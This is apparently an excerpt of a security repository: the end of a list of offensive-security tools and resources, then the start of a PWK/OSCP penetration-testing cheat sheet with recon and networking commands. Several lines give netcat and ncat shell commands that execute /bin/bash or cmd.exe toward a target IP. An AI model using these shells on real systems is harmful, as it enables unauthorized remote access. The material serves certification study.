162 | * [wifiphisher](https://github.com/sophron/wifiphisher) - Automated phishing attacks against Wi-Fi networks
163 |
164 | #### SSL Analysis Tools
165 | * [SSLyze](https://github.com/nabla-c0d3/sslyze) - SSL configuration scanner
166 | * [sslstrip](https://www.thoughtcrime.org/software/sslstrip/) - a demonstration of the HTTPS stripping attacks
167 | * [sslstrip2](https://github.com/LeonardoNve/sslstrip2) - SSLStrip version to defeat HSTS
168 | * [tls_prober](https://github.com/WestpointLtd/tls_prober) - fingerprint a server's SSL/TLS implementation
169 |
170 | #### Web exploitation
171 | * [WPScan](https://wpscan.org/) - Black box WordPress vulnerability scanner
172 | * [SQLmap](http://sqlmap.org/) - Automatic SQL injection and database takeover tool
173 | * [weevely3](https://github.com/epinna/weevely3) - Weaponized web shell
174 | * [Wappalyzer](https://wappalyzer.com/) - Wappalyzer uncovers the technologies used on websites
175 | * [cms-explorer](https://code.google.com/archive/p/cms-explorer/) - CMS Explorer is designed to reveal the the specific modules, plugins, components and themes that various CMS driven web sites are running.
176 | * [joomscan](https://www.owasp.org/index.php/Category:OWASP_Joomla_Vulnerability_Scanner_Project) - Joomla CMS scanner
177 | * [WhatWeb](https://github.com/urbanadventurer/WhatWeb) - Website Fingerprinter
178 | * [BlindElephant](http://blindelephant.sourceforge.net/) - Web Application Fingerprinter
179 | * [fimap](https://github.com/kurobeats/fimap) - Find, prepare, audit, exploit and even google automatically for LFI/RFI bugs
180 | * [Kadabra](https://github.com/D35m0nd142/Kadabra) - Automatic LFI exploiter and scanner
181 | * [Kadimus](https://github.com/P0cL4bs/Kadimus) - LFI scan and exploit tool
182 | * [liffy](https://github.com/hvqzao/liffy) - LFI exploitation tool
183 |
184 | #### Hex Editors
185 | * [HexEdit.js](https://hexed.it) - Browser-based hex editing
186 | * [Hexinator](https://hexinator.com/) (commercial) - World's finest Hex Editor
187 | * [HxD - Freeware Hex Editor and Disk Editor](https://mh-nexus.de/en/hxd/)
188 |
189 |
190 | #### Crackers
191 | * [John the Ripper](http://www.openwall.com/john/) - Fast password cracker
192 | * [Online MD5 cracker](http://www.md5crack.com/) - Online MD5 hash Cracker
193 | * [Hashcat](http://hashcat.net/hashcat/) - The more fast hash cracker
194 |
195 | #### Windows Utils
196 | * [Sysinternals Suite](https://technet.microsoft.com/en-us/sysinternals/bb842062) - The Sysinternals Troubleshooting Utilities
197 | * [Windows Credentials Editor](http://www.ampliasecurity.com/research/windows-credentials-editor/) - security tool to list logon sessions and add, change, list and delete associated credentials
198 | * [mimikatz](http://blog.gentilkiwi.com/mimikatz) - Credentials extraction tool for Windows OS
199 | * [PowerSploit](https://github.com/PowerShellMafia/PowerSploit) - A PowerShell Post-Exploitation Framework
200 | * [Windows Exploit Suggester](https://github.com/GDSSecurity/Windows-Exploit-Suggester) - Detects potential missing patches on the target
201 | * [Responder](https://github.com/SpiderLabs/Responder) - A LLMNR, NBT-NS and MDNS poisoner
202 | * [Bloodhound](https://github.com/adaptivethreat/Bloodhound/wiki) - A graphical Active Directory trust relationship explorer
203 | * [Empire](https://github.com/PowerShellEmpire/Empire) - Empire is a pure PowerShell post-exploitation agent
204 | * [Fibratus](https://github.com/rabbitstack/fibratus) - Tool for exploration and tracing of the Windows kernel
205 |
206 | #### Linux Utils
207 | * [Linux Exploit Suggester](https://github.com/PenturaLabs/Linux_Exploit_Suggester) - Linux Exploit Suggester; based on operating system release number.
208 |
209 | #### DDoS Tools
210 | * [LOIC](https://github.com/NewEraCracker/LOIC/) - An open source network stress tool for Windows
211 | * [JS LOIC](http://metacortexsecurity.com/tools/anon/LOIC/LOICv1.html) - JavaScript in-browser version of LOIC
212 | * [T50](https://sourceforge.net/projects/t50/) - The more fast network stress tool
213 |
214 | #### Social Engineering Tools
215 | * [SET](https://github.com/trustedsec/social-engineer-toolkit) - The Social-Engineer Toolkit from TrustedSec
216 |
217 | #### OSInt Tools
218 | * [Maltego](http://www.paterva.com/web7/) - Proprietary software for open source intelligence and forensics, from Paterva.
219 | * [theHarvester](https://github.com/laramies/theHarvester) - E-mail, subdomain and people names harvester
220 | * [creepy](https://github.com/ilektrojohn/creepy) - A geolocation OSINT tool
221 | * [metagoofil](https://github.com/laramies/metagoofil) - Metadata harvester
222 | * [Google Hacking Database](https://www.exploit-db.com/google-hacking-database/) - a database of Google dorks; can be used for recon
223 | * [Censys](https://www.censys.io/) - Collects data on hosts and websites through daily ZMap and ZGrab scans
224 | * [Shodan](https://www.shodan.io/) - Shodan is the world's first search engine for Internet-connected devices
225 | * [recon-ng](https://bitbucket.org/LaNMaSteR53/recon-ng) - A full-featured Web Reconnaissance framework written in Python
226 | * [github-dorks](https://github.com/techgaun/github-dorks) - CLI tool to scan github repos/organizations for potential sensitive information leak
227 | * [vcsmap](https://github.com/melvinsh/vcsmap) - A plugin-based tool to scan public version control systems for sensitive information
228 | * [Spiderfoot](http://www.spiderfoot.net/) - multi-source OSINT automation tool with a Web UI and report visualizations
229 |
230 | #### Anonymity Tools
231 | * [Tor](https://www.torproject.org/) - The free software for enabling onion routing online anonymity
232 | * [I2P](https://geti2p.net/en/) - The Invisible Internet Project
233 | * [Nipe](https://github.com/GouveaHeitor/nipe) - Script to redirect all traffic from the machine to the Tor network.
234 |
235 | #### Reverse Engineering Tools
236 | * [IDA Pro](https://www.hex-rays.com/products/ida/) - A Windows, Linux or Mac OS X hosted multi-processor disassembler and debugger
237 | * [IDA Free](https://www.hex-rays.com/products/ida/support/download_freeware.shtml) - The freeware version of IDA v5.0
238 | * [WDK/WinDbg](https://msdn.microsoft.com/en-us/windows/hardware/hh852365.aspx) - Windows Driver Kit and WinDbg
239 | * [OllyDbg](http://www.ollydbg.de/) - An x86 debugger that emphasizes binary code analysis
240 | * [Radare2](http://rada.re/r/index.html) - Opensource, crossplatform reverse engineering framework
241 | * [x64_dbg](http://x64dbg.com/) - An open-source x64/x32 debugger for windows
242 | * [Immunity Debugger](http://debugger.immunityinc.com/) - A powerful new way to write exploits and analyze malware
243 | * [Evan's Debugger](http://www.codef00.com/projects#debugger) - OllyDbg-like debugger for Linux
244 | * [Medusa disassembler](https://github.com/wisk/medusa) - An open source interactive disassembler
245 | * [plasma](https://github.com/joelpx/plasma) - Interactive disassembler for x86/ARM/MIPS. Generates indented pseudo-code with colored syntax code
246 | * [peda](https://github.com/longld/peda) - Python Exploit Development Assistance for GDB
247 | * [dnSpy](https://github.com/0xd4d/dnSpy) - dnSpy is a tool to reverse engineer .NET assemblies
248 |
249 | #### CTF Tools
250 | * [Pwntools](https://github.com/Gallopsled/pwntools) - CTF framework for use in CTFs
251 |
252 | ### Books
253 | #### Penetration Testing Books
254 | * [The Art of Exploitation by Jon Erickson, 2008](http://amzn.to/2iqhK9S)
255 | * [Metasploit: The Penetration Tester's Guide by David Kennedy et al., 2011](http://amzn.to/2jl5pUd)
256 | * [Penetration Testing: A Hands-On Introduction to Hacking by Georgia Weidman, 2014](http://amzn.to/2jMfK8i)
257 | * [Rtfm: Red Team Field Manual by Ben Clark, 2014](http://amzn.to/2iz9K4Y)
258 | * [The Hacker Playbook 2: Practical Guide To Penetration Testing](http://amzn.to/2jMdNbU)
259 | * [The Basics of Hacking and Penetration Testing by Patrick Engebretson, 2013](http://amzn.to/2jMgMkj)
260 | * [Professional Penetration Testing by Thomas Wilhelm, 2013](http://amzn.to/2jMq9AI)
261 | * [Advanced Penetration Testing for Highly-Secured Environments by Lee Allen, 2012](http://amzn.to/2jl6GKU)
262 | * [Violent Python by TJ O'Connor, 2012](http://amzn.to/2jMbTYy)
263 | * [Fuzzing: Brute Force Vulnerability Discovery by Michael Sutton et al., 2007](http://amzn.to/2izbgDS)
264 | * [Black Hat Python: Python Programming for Hackers and Pentesters by Justin Seitz, 2014](http://amzn.to/2jl5FCk)
265 | * [Penetration Testing: Procedures & Methodologies by EC-Council, 2010](http://amzn.to/2izaBmc)
266 | * [Unauthorised Access: Physical Penetration Testing For IT Security Teams by Wil Allsopp, 2010](http://amzn.to/2izcwqI)
267 | * [Advanced Persistent Threat Hacking: The Art and Science of Hacking Any Organization by Tyler Wrightson, 2014](http://amzn.to/2iqoyEj)
268 | * [Bug Hunter's Diary by Tobias Klein, 2011](http://amzn.to/2jkYHO2)
269 |
270 | #### Hackers Handbook Series
271 | * [The Database Hacker's Handbook, David Litchfield et al., 2005](http://amzn.to/2jlcqEB)
272 | * [The Shellcoders Handbook by Chris Anley et al., 2007](http://amzn.to/2iudxwQ)
273 | * [The Mac Hacker's Handbook by Charlie Miller & Dino Dai Zovi, 2009](http://amzn.to/2jSUpxO)
274 | * [The Web Application Hackers Handbook by D. Stuttard, M. Pinto, 2011](http://amzn.to/2jl0rGQ)
275 | * [iOS Hackers Handbook by Charlie Miller et al., 2012](http://amzn.to/2jMpWO4)
276 | * [Android Hackers Handbook by Joshua J. Drake et al., 2014](http://amzn.to/2jmN5tg)
277 | * [The Browser Hackers Handbook by Wade Alcorn et al., 2014](http://amzn.to/2jl9asy)
278 | * [The Mobile Application Hackers Handbook by Dominic Chell et al., 2015](http://amzn.to/2jMmtz1)
279 | * [Car Hacker's Handbook by Craig Smith, 2016](http://amzn.to/2jldxnL)
280 |
281 | #### Defensive Development
282 |
283 | * [Holistic Info-Sec for Web Developers (Fascicle 0)](http://amzn.to/2jmRqwB)
284 | * [Holistic Info-Sec for Web Developers (Fascicle 1)](https://leanpub.com/holistic-infosec-for-web-developers-fascicle1-vps-network-cloud-webapplications)
285 |
286 | #### Network Analysis Books
287 | * [Nmap Network Scanning by Gordon Fyodor Lyon, 2009](http://amzn.to/2izkmAN)
288 | * [Practical Packet Analysis by Chris Sanders, 2011](http://amzn.to/2jn091H)
289 | * [Wireshark Network Analysis by by Laura Chappell & Gerald Combs, 2012](http://amzn.to/2jn4DFU)
290 | * [Network Forensics: Tracking Hackers through Cyberspace by Sherri Davidoff & Jonathan Ham, 2012](http://amzn.to/2izaCXe)
291 |
292 | #### Reverse Engineering Books
293 | * [Reverse Engineering for Beginners by Dennis Yurichev](http://beginners.re/)
294 | * [Hacking the Xbox by Andrew Huang, 2003](http://amzn.to/2iudEbO)
295 | * [The IDA Pro Book by Chris Eagle, 2011](http://amzn.to/2itYfbI)
296 | * [Practical Reverse Engineering by Bruce Dang et al., 2014](http://amzn.to/2jMnAyD)
297 | * [Gray Hat Hacking The Ethical Hacker's Handbook by Daniel Regalado et al., 2015](http://amzn.to/2iua6q7)
298 |
299 | #### Malware Analysis Books
300 | * [Practical Malware Analysis by Michael Sikorski & Andrew Honig, 2012](http://amzn.to/2izon8f)
301 | * [The Art of Memory Forensics by Michael Hale Ligh et al., 2014](http://amzn.to/2iuh1j8)
302 | * [Malware Analyst's Cookbook and DVD by Michael Hale Ligh et al., 2010](http://amzn.to/2jnag6W)
303 |
304 | #### Windows Books
305 | * [Windows Internals by Mark Russinovich et al., 2012](http://amzn.to/2jl4zGJ)
306 |
307 | #### Social Engineering Books
308 | * [The Art of Deception by Kevin D. Mitnick & William L. Simon, 2002](http://amzn.to/2jMhgXQ)
309 | * [The Art of Intrusion by Kevin D. Mitnick & William L. Simon, 2005](http://amzn.to/2jl287p)
310 | * [Ghost in the Wires by Kevin D. Mitnick & William L. Simon, 2011](http://amzn.to/2izbuuV)
311 | * [No Tech Hacking by Johnny Long & Jack Wiles, 2008](http://amzn.to/2iudb9G)
312 | * [Social Engineering: The Art of Human Hacking by Christopher Hadnagy, 2010](http://amzn.to/2iu62WZ)
313 | * [Unmasking the Social Engineer: The Human Element of Security by Christopher Hadnagy, 2014](http://amzn.to/2izf4W5)
314 | * [Social Engineering in IT Security: Tools, Tactics, and Techniques by Sharon Conheady, 2014](http://amzn.to/2izlww9)
315 |
316 | #### Lock Picking Books
317 | * [Practical Lock Picking by Deviant Ollam, 2012](http://amzn.to/2jmQeJy)
318 | * [Keys to the Kingdom by Deviant Ollam, 2012](http://amzn.to/2izcvDg)
319 | * [CIA Lock Picking Field Operative Training Manual](http://amzn.to/2jMrw2c)
320 | * [Lock Picking: Detail Overkill by Solomon](https://www.dropbox.com/s/y39ix9u9qpqffct/Lockpicking%20Detail%20Overkill.pdf?dl=0)
321 | * [Eddie the Wire books](https://www.dropbox.com/sh/k3z4dm4vyyojp3o/AAAIXQuwMmNuCch_StLPUYm-a?dl=0)
322 |
323 | ### Vulnerability Databases
324 | * [NVD](https://nvd.nist.gov/) - US National Vulnerability Database
325 | * [CERT](https://www.us-cert.gov/) - US Computer Emergency Readiness Team
326 | * [OSVDB](https://blog.osvdb.org/) - Open Sourced Vulnerability Database
327 | * [Bugtraq](http://www.securityfocus.com/) - Symantec SecurityFocus
328 | * [Exploit-DB](https://www.exploit-db.com/) - Offensive Security Exploit Database
329 | * [Fulldisclosure](http://seclists.org/fulldisclosure/) - Full Disclosure Mailing List
330 | * [MS Bulletin](https://technet.microsoft.com/en-us/security/bulletins) - Microsoft Security Bulletin
331 | * [MS Advisory](https://technet.microsoft.com/en-us/security/advisories) - Microsoft Security Advisories
332 | * [Inj3ct0r](http://www.1337day.com/) - Inj3ct0r Exploit Database
333 | * [Packet Storm](https://packetstormsecurity.com/) - Packet Storm Global Security Resource
334 | * [SecuriTeam](http://www.securiteam.com/) - Securiteam Vulnerability Information
335 | * [CXSecurity](http://cxsecurity.com/) - CSSecurity Bugtraq List
336 | * [Vulnerability Laboratory](http://www.vulnerability-lab.com/) - Vulnerability Research Laboratory
337 | * [ZDI](http://www.zerodayinitiative.com/) - Zero Day Initiative
338 | * [Vulners](https://vulners.com) - Security database of software vulnerabilities
339 |
340 | ### Security Courses
341 | * [Offensive Security Training](https://www.offensive-security.com/information-security-training/) - Training from BackTrack/Kali developers
342 | * [SANS Security Training](http://www.sans.org/) - Computer Security Training & Certification
343 | * [Open Security Training](http://opensecuritytraining.info/) - Training material for computer security classes
344 | * [CTF Field Guide](https://trailofbits.github.io/ctf/) - everything you need to win your next CTF competition
345 | * [ARIZONA CYBER WARFARE RANGE](http://azcwr.org/) - 24x7 live fire exercises for beginners through real world operations; capability for upward progression into the real world of cyber warfare.
346 | * [Cybrary](http://cybrary.it) - Free courses in ethical hacking and advanced penetration testing. Advanced penetration testing courses are based on the book 'Penetration Testing for Highly Secured Enviroments'.
347 | * [Computer Security Student](http://computersecuritystudent.com) - Many free tutorials, great for beginners, $10/mo membership unlocks all content
348 | * [European Union Agency for Network and Information Security](https://www.enisa.europa.eu/topics/trainings-for-cybersecurity-specialists/online-training-material) - ENISA Cyber Security Training material
349 |
350 | ### Information Security Conferences
351 | * [DEF CON](https://www.defcon.org/) - An annual hacker convention in Las Vegas
352 | * [Black Hat](http://www.blackhat.com/) - An annual security conference in Las Vegas
353 | * [BSides](http://www.securitybsides.com/) - A framework for organising and holding security conferences
354 | * [CCC](https://events.ccc.de/congress/) - An annual meeting of the international hacker scene in Germany
355 | * [DerbyCon](https://www.derbycon.com/) - An annual hacker conference based in Louisville
356 | * [PhreakNIC](http://phreaknic.info/) - A technology conference held annually in middle Tennessee
357 | * [ShmooCon](http://shmoocon.org/) - An annual US east coast hacker convention
358 | * [CarolinaCon](http://www.carolinacon.org/) - An infosec conference, held annually in North Carolina
359 | * [CHCon](https://chcon.nz) - Christchurch Hacker Con, Only South Island of New Zealand hacker con
360 | * [SummerCon](http://www.summercon.org/) - One of the oldest hacker conventions, held during Summer
361 | * [Hack.lu](https://2016.hack.lu/) - An annual conference held in Luxembourg
362 | * [HITB](https://conference.hitb.org/) - Deep-knowledge security conference held in Malaysia and The Netherlands
363 | * [Troopers](https://www.troopers.de) - Annual international IT Security event with workshops held in Heidelberg, Germany
364 | * [Hack3rCon](http://hack3rcon.org/) - An annual US hacker conference
365 | * [ThotCon](http://thotcon.org/) - An annual US hacker conference held in Chicago
366 | * [LayerOne](http://www.layerone.org/) - An annual US security conference held every spring in Los Angeles
367 | * [DeepSec](https://deepsec.net/) - Security Conference in Vienna, Austria
368 | * [SkyDogCon](http://www.skydogcon.com/) - A technology conference in Nashville
369 | * [SECUINSIDE](http://secuinside.com) - Security Conference in [Seoul](https://en.wikipedia.org/wiki/Seoul)
370 | * [DefCamp](http://def.camp/) - Largest Security Conference in Eastern Europe, held anually in Bucharest, Romania
371 | * [AppSecUSA](https://appsecusa.org/) - An annual conference organised by OWASP
372 | * [BruCON](http://brucon.org) - An annual security conference in Belgium
373 | * [Infosecurity Europe](http://www.infosecurityeurope.com/) - Europe's number one information security event, held in London, UK
374 | * [Nullcon](http://nullcon.net/website/) - An annual conference in Delhi and Goa, India
375 | * [RSA Conference USA](https://www.rsaconference.com/) - An annual security conference in San Francisco, California, USA
376 | * [Swiss Cyber Storm](https://www.swisscyberstorm.com/) - An annual security conference in Lucerne, Switzerland
377 | * [Virus Bulletin Conference](https://www.virusbulletin.com/conference/index) - An annual conference going to be held in Denver, USA for 2016
378 | * [Ekoparty](http://www.ekoparty.org) - Largest Security Conference in Latin America, held annually in Buenos Aires, Argentina
379 | * [44Con](https://44con.com/) - Annual Security Conference held in London
380 | * [BalCCon](https://www.balccon.org) - Balkan Computer Congress, annualy held in Novi Sad, Serbia
381 | * [FSec](http://fsec.foi.hr) - FSec - Croatian Information Security Gathering in Varaždin, Croatia
382 |
383 | ### Information Security Magazines
384 | * [2600: The Hacker Quarterly](https://www.2600.com/Magazine/DigitalEditions) - An American publication about technology and computer "underground"
385 | * [Phrack Magazine](http://www.phrack.org/) - By far the longest running hacker zine
386 |
387 | Please have a look at
388 | * [Top Hacking Books](http://www.kalitut.com/2016/12/best-ethical-hacking-books.html)
389 | * [Top Reverse Engineering Books](http://www.kalitut.com/2017/01/Best-reverse-engineering-books.html)
390 | * [Top Machine learning Books](http://www.kalitut.com/2017/01/machine-learning-book.html)
391 | * [Top 5 books Programming Books](http://www.kalitut.com/2017/01/Top-Programming-Books.html)
392 | * [Top Java Books](http://www.kalitut.com/2017/01/Best-Java-Programming-Books.html)
393 |
394 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # PWK-CheatSheet
2 |
3 |
4 |
5 | ██▓███ █ ███ ▄█▀ ▄████▄ ██░ ██▓█████▄▄▄ ▄▄▄█████▓ ██████ ██░ ██▓█████▓████▄▄▄█████▓
6 | ▓██░ ██▓█░ █ ░███▄█▒ ▒██▀ ▀█ ▓██░ ██▓█ ▒████▄ ▓ ██▒ ▓▒ ▒██ ▒▓██░ ██▓█ ▀▓█ ▓ ██▒ ▓▒
7 | ▓██░ ██▓▒█░ █ ░▓███▄░ ▒▓█ ▄▒██▀▀██▒███ ▒██ ▀█▄▒ ▓██░ ▒░ ░ ▓██▄ ▒██▀▀██▒███ ▒███ ▒ ▓██░ ▒░
8 | ▒██▄█▓▒ ░█░ █ ░▓██ █▄ ▒▓▓▄ ▄██░▓█ ░██▒▓█ ░██▄▄▄▄█░ ▓██▓ ░ ▒ ██░▓█ ░██▒▓█ ▄▒▓█ ░ ▓██▓ ░
9 | ▒██▒ ░ ░░██▒██▒██▒ █▄ ▒ ▓███▀ ░▓█▒░██░▒████▓█ ▓██▒▒██▒ ░ ▒██████▒░▓█▒░██░▒████░▒████▒▒██▒ ░
10 | ▒▓▒░ ░ ░ ▓░▒ ▒▒ ▒▒ ▓▒ ░ ░▒ ▒ ░▒ ░░▒░░░ ▒░ ▒▒ ▓▒█░▒ ░░ ▒ ▒▓▒ ▒ ░▒ ░░▒░░░ ▒░ ░░ ▒░ ░▒ ░░
11 | ░▒ ░ ▒ ░ ░░ ░▒ ▒░ ░ ▒ ▒ ░▒░ ░░ ░ ░▒ ▒▒ ░ ░ ░ ░▒ ░ ░▒ ░▒░ ░░ ░ ░░ ░ ░ ░
12 | ░░ ░ ░░ ░░ ░ ░ ░ ░░ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░
13 | ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
14 | ░
15 |
16 | #### Penetration Testing with Kali Linux (PWK) course and Offensive Security Certified Professional (OSCP) Cheat Sheet
17 |
18 | ## Table of Contents
19 | - [Linux 101](#linux-101)
20 | - [Information Gathering & Vulnerability Scanning](#information-gathering--vulnerability-scanning)
21 | * [Passive Information Gathering](#passive-information-gathering)
22 | * [Active Information Gathering](#active-information-gathering)
23 | * [Port Scanning](#port-scanning)
24 | * [Enumeration](#enumeration)
25 | * [HTTP Enumeration](#http-enumeration)
26 | - [Buffer Overflows and Exploits](#buffer-overflows-and-exploits)
27 | - [Shells](#shells)
28 | - [File Transfers](#file-transfers)
29 | - [Privilege Escalation](#privilege-escalation)
30 | * [Linux Privilege Escalation](#linux-privilege-escalation)
31 | * [Windows Privilege Escalation](#windows-privilege-escalation)
32 | - [Client, Web and Password Attacks](#client-web-and-password-attacks)
33 | * [Client Attacks](#client-attacks)
34 | * [Web Attacks](#web-attacks)
35 | * [File Inclusion Vulnerabilities LFI/RFI](#file-inclusion-vulnerabilities)
36 | * [Database Vulnerabilities](#database-vulnerabilities)
37 | * [Password Attacks](#password-attacks)
38 | * [Password Hash Attacks](#password-hash-attacks)
39 | - [Networking, Pivoting and Tunneling](#networking-pivoting-and-tunneling)
40 | - [The Metasploit Framework](#the-metasploit-framework)
41 | - [Bypassing Antivirus Software](#bypassing-antivirus-software)
42 |
43 | Linux 101
44 | ===============================================================================================================================
45 | # Set the Target IP Address to the $ip system variable
46 | ```shell
47 | $ export ip=192.168.1.100
48 | ```
49 | # Find the location of a file
50 | ```shell
51 | $ locate sbd.exe
52 | ```
53 | # Search through directories in the $PATH environment variable
54 | ```shell
55 | $ which sbd
56 | ```
57 | # Find a search for a file that contains a specific string in it’s name
58 | ```shell
59 | $ find / -name sbd\*
60 | ```
61 | # Show active internet connections
62 | ```shell
63 | $ netstat -lntp
64 | ```
65 | # Change Password
66 | ```shell
67 | $ passwd
68 | ```
69 | # Verify a service is running and listening
70 | ```shell
71 | $ netstat -antp |grep apache
72 | ```
73 | # Start a service
74 | ```shell
75 | $ systemctl start ssh
76 | $ systemctl start apache2
77 | ```
78 | # Unzip a gz file
79 | ```shell
80 | $ gunzip access.log.gz
81 | ```
82 | # Unzip a tar.gz file
83 | ```shell
84 | $ tar -xzvf file.tar.gz
85 | ```
86 | - Search command history
87 | ```shell
88 | history | grep phrase\_to\_search\_for
89 | ```
90 |
91 | - Have a service start at boot
92 | ```shell
93 | systemctl enable ssh
94 | ```
95 | - Stop a service
96 | `systemctl stop ssh`
97 |
98 | - Download a webpage
99 | `wget [www.cisco.com](http://www.cisco.com)`
100 |
101 | - Open a webpage
102 | `curl [www.cisco.com](http://www.cisco.com)
103 |
104 | - String manipulation
105 |
106 | - Count number of lines in file
107 | `wc index.html`
108 |
109 | - Get the start or end of a file
110 | `head index.html `
111 | `tail index.html`
112 |
113 | - Extract all the lines that contain a string
114 | `grep "href=" index.html`
115 |
116 | - Cut a string by a delimiter, filter results then sort
117 | `grep "href=" index.html | cut -d "/" -f 3 | grep "\\." | cut -d '"' -f 1 | sort -u`
118 |
119 | - Using Grep and regular expressions and output to a file
120 | `cat index.html | grep -o 'http://\[^"\]\*' | cut -d "/" -f 3 | sort –u > list.txt`
121 |
122 | - Use a bash loop to find the IP address behind each host
123 | `for url in $(cat list.txt); do host $url; done`
124 |
125 | - Collect all the IP Addresses from a log file and sort by
126 | frequency
127 | `cat access.log | cut -d " " -f 1 | sort | uniq -c | sort -urn`
128 |
129 | - Netcat - Read and write TCP and UDP Packets
130 |
131 | - Connect to a POP3 mail server
132 | `nc -nv $ip 110`
133 |
134 | - Listen on TCP/UDP port
135 | `nc -nlvp 4444`
136 |
137 | - Connect to a netcat port
138 | `nc -nv $ip 4444`
139 |
140 | - Send a file using netcat
141 | `nc -nv $ip 4444 < /usr/share/windows-binaries/wget.exe`
142 |
143 | - Receive a file using netcat
144 | `nc -nlvp 4444 > incoming.exe`
145 |
146 | - Create a reverse shell with Ncat using cmd.exe on Windows
147 | `nc -nlvp 4444 -e cmd.exe`
148 |
149 | - Create a reverse shell with Ncat using bash on Linux
150 | `nc -nv $ip 4444 -e /bin/bash`
151 |
152 | - Ncat - Netcat for Nmap project which provides more security avoid
153 | IDS
154 |
155 | - Reverse shell from windows using cmd.exe using ssl
156 | `ncat --exec cmd.exe --allow $ip -vnl 4444 --ssl`
157 |
158 | - Listen on port 4444 using ssl
159 | `ncat -v $ip 4444 --ssl`
160 |
161 | - Wireshark
162 | - Show only SMTP (port 25) and ICMP traffic:
163 | `tcp.port eq 25 or icmp`
164 |
165 | - Show only traffic in the LAN (192.168.x.x), between workstations and servers -- no Internet:
166 | `ip.src==192.168.0.0/16 and ip.dst==192.168.0.0/16`
167 |
168 | - Filter by a protocol ( e.g. SIP ) and filter out unwanted IPs:
169 | `ip.src != xxx.xxx.xxx.xxx && ip.dst != xxx.xxx.xxx.xxx && sip`
170 |
171 | - Some commands are equal
172 | `ip.addr == 10.43.54.65`
173 | Equals
174 | `ip.src == 10.43.54.65 or ip.dst == 10.43.54.65 `
175 |
176 | ` ip.addr != 10.43.54.65`
177 | Equals
178 | `ip.src != 10.43.54.65 or ip.dst != 10.43.54.65`
179 |
180 | - Tcpdump
181 |
182 | - Display a pcap file
183 | `tcpdump -r password\_cracking\_filtered.pcap`
184 |
185 | - Display ips and filter and sort
186 | `tcpdump -n -r password\_cracking\_filtered.pcap | awk -F" " '{print $3}' | sort -u | head`
187 |
188 | - Grab a packet capture on port 80
189 | `tcpdump tcp port 80 -w output.pcap -i eth0`
190 |
191 | - Check for ACK or PSH flag set in a TCP packet
192 | `tcpdump -A -n 'tcp\[13\] = 24' -r password\_cracking\_filtered.pcap`
193 |
194 | - IPTables deny traffic to ports except for Local Loopback
195 | ```shell
196 | iptables -A INPUT -p tcp --destination-port 13327 \\! -d $ip -j DROP
197 | iptables -A INPUT -p tcp --destination-port 4444 \\! -d $ip -j DROP
198 | ```
199 | Information Gathering & Vulnerability Scanning
200 | ===============================================================================================================================
201 |
202 | - Passive Information Gathering
203 | ---------------------------------------------------------------------------------------------------------------------------
204 |
205 | - Google Hacking
206 |
207 | - Google search to find website sub domains
208 | `site:microsoft.com`
209 | `site:[www.microsoft.com](http://www.microsoft.com)`
210 |
211 | - Google filetype, and intitle
212 | `intitle:”netbotz appliance” “OK” -filetype:pdf`
213 |
214 | - Google inurl
215 | `inurl:”level/15/sexec/-/show”`
216 |
217 | - Google Hacking Database:
218 | https://www.exploit-db.com/google-hacking-database/
219 |
220 | - SSL Certificate Testing
221 | [*https://www.ssllabs.com/ssltest/analyze.html*](https://www.ssllabs.com/ssltest/analyze.html)
222 |
223 | - Email Harvesting
224 |
225 | - Simply Email
226 | `git clone https://github.com/killswitch-GUI/SimplyEmail.git `
227 | `./SimplyEmail.py -all -e TARGET-DOMAIN`
228 |
229 | - Netcraft
230 |
231 | - Determine the operating system and tools used to build a site
232 | https://searchdns.netcraft.com/
233 |
234 | - Whois Enumeration
235 | `whois domain-name-here.com `
236 | `whois $ip`
237 |
238 | - Banner Grabbing
239 |
240 | - `nc -v $ip 25`
241 |
242 | - `telnet $ip 25`
243 |
244 | - `nc TARGET-IP 80`
245 |
246 | - Recon-ng - full-featured web reconnaissance framework written in Python
247 |
248 | - `cd /opt; git clone https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git `
249 | `cd /opt/recon-ng `
250 | `./recon-ng `
251 | `show modules `
252 | `help`
253 |
254 | - Active Information Gathering
255 | --------------------------------------------------------------------------------------------------------------------------
256 |
257 |
258 |
259 | - DNS Enumeration
260 |
261 | - Host Lookup
262 | `host -t ns megacorpone.com`
263 |
264 | - Reverse Lookup Brute Force - find domains in the same range
265 | `for ip in $(seq 155 190);do host 50.7.67.$ip;done |grep -v "not found"`
266 |
267 | - Perform DNS IP Lookup
268 | `dig a domain-name-here.com @nameserver`
269 |
270 | - Perform MX Record Lookup
271 | `dig mx domain-name-here.com @nameserver`
272 |
273 | - Perform Zone Transfer with DIG
274 | `dig axfr domain-name-here.com @nameserver`
275 |
276 | - DNS Zone Transfers
277 | Windows DNS zone transfer
278 | `nslookup -> set type=any -> ls -d blah.com `
279 | Linux DNS zone transfer
280 | `dig axfr blah.com @ns1.blah.com`
281 |
282 | - Dnsrecon DNS Brute Force
283 | `dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml`
284 |
285 | - Dnsrecon DNS List of megacorp
286 | `dnsrecon -d megacorpone.com -t axfr`
287 |
288 | - DNSEnum
289 | `dnsenum zonetransfer.me`
290 |
291 | - Port Scanning
292 | -----------------------------------------------------------------------------------------------------------
293 | *Subnet Reference Table*
294 |
295 | / | Addresses | Hosts | Netmask | Amount of a Class C
296 | --- | --- | --- | --- | ---
297 | /30 | 4 | 2 | 255.255.255.252| 1/64
298 | /29 | 8 | 6 | 255.255.255.248 | 1/32
299 | /28 | 16 | 14 | 255.255.255.240 | 1/16
300 | /27 | 32 | 30 | 255.255.255.224 | 1/8
301 | /26 | 64 | 62 | 255.255.255.192 | 1/4
302 | /25 | 128 | 126 | 255.255.255.128 | 1/2
303 | /24 | 256 | 254 | 255.255.255.0 | 1
304 | /23 | 512 | 510 | 255.255.254.0 | 2
305 | /22 | 1024 | 1022 | 255.255.252.0 | 4
306 | /21 | 2048 | 2046 | 255.255.248.0 | 8
307 | /20 | 4096 | 4094 | 255.255.240.0 | 16
308 | /19 | 8192 | 8190 | 255.255.224.0 | 32
309 | /18 | 16384 | 16382 | 255.255.192.0 | 64
310 | /17 | 32768 | 32766 | 255.255.128.0 | 128
311 | /16 | 65536 | 65534 | 255.255.0.0 | 256
312 |
313 | - Set the ip address as a varble
314 | `export ip=192.168.1.100 `
315 | `nmap -A -T4 -p- $ip`
316 |
317 | - Netcat port Scanning
